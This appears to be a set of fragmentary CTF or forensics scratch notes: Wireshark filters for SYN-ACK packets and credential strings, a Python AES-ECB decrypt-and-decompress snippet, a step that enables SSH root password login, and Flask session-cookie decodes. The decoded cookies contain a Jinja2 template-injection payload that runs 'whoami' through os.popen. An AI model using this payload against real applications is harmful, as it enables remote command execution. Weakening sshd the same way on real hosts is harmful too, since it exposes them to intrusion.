没了
tcp.flags.syn==1 and tcp.flags.ack==1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
  

from Crypto.Cipher import AES

import zlib

key = b'748007e861908c03'

hex_string = 'b5c1fadbb7e28da08572486d8e6933a84c5144463f178b352c5bda71cff4e8ffe919f0f115a528ebfc4a79b03aea0e31cb22d460ada998c7657d4d0f1be71ffa'

byte_data = bytes.fromhex(hex_string)

  

cipher = AES.new(key, AES.MODE_ECB)

decrypted_data = cipher.decrypt(byte_data)

  
  

s = zlib.decompress(decrypted_data,16 + zlib.MAX_WBITS)

sa= str(s)

print(sa)

ubuntu
sudo vi /etc/ssh/sshd_config

把permitrootlogin prohibit-password改成permitrootlogin yes

tcp contains “username” && tcp contains “passwd”

R-studio

stikynot.exe snt 后缀

tcp contains “{"errcode":200}”

1
2
3
4
5
6
python .\flask_session_cookie_manager3.py decode -s "ssti_flask_hsfvaldb" -c ".eJwdx1EKwyAMANCrDEGiPz1Ar1KGZBi7gBpplH2Idy_d-3vTDKWrYiGzm2k5vZRUWeo2WsRObkLKeMKeuekoB4RwZvlg1hDg_S917lSeOhAFf0CTRvXp7ytYGPx2EUbnl7drWqqRk11m3cGmKw0.YpIQcw.J5vs8t8bAr0xDIxF6EqUAH2kkLE"
{'username': "{%if session.update({'flag':lipsum['__globals__']['__getitem__']('os')['popen']('whoami').read()})%}{%endif%}"}


python .\flask_session_cookie_manager3.py decode -s "ssti_flask_hsfvaldb" -c ".eJwdylsKAyEMQNGtFEGiUGYBs5VpkRQz04AvjNIPce-t_TyXO9QZ8FK7quQfSd1VF6oJI_3S0HzehEQ4p60Xj43MgPXDHrhIjwc4d4X8wiDOwfNPatwoLhrIAvaAkgulxc87Y2SwWyX0xk6r59CUPJ96qvkFHeUvmg.YpIQkg.65xf8l2g9fXAImkfyihId46KkY4"
{'flag': 'red\n', 'username': "{%if session.update({'flag':lipsum['__globals__']['__getitem__']('os')['popen']('whoami').read()})%}{%endif%}"}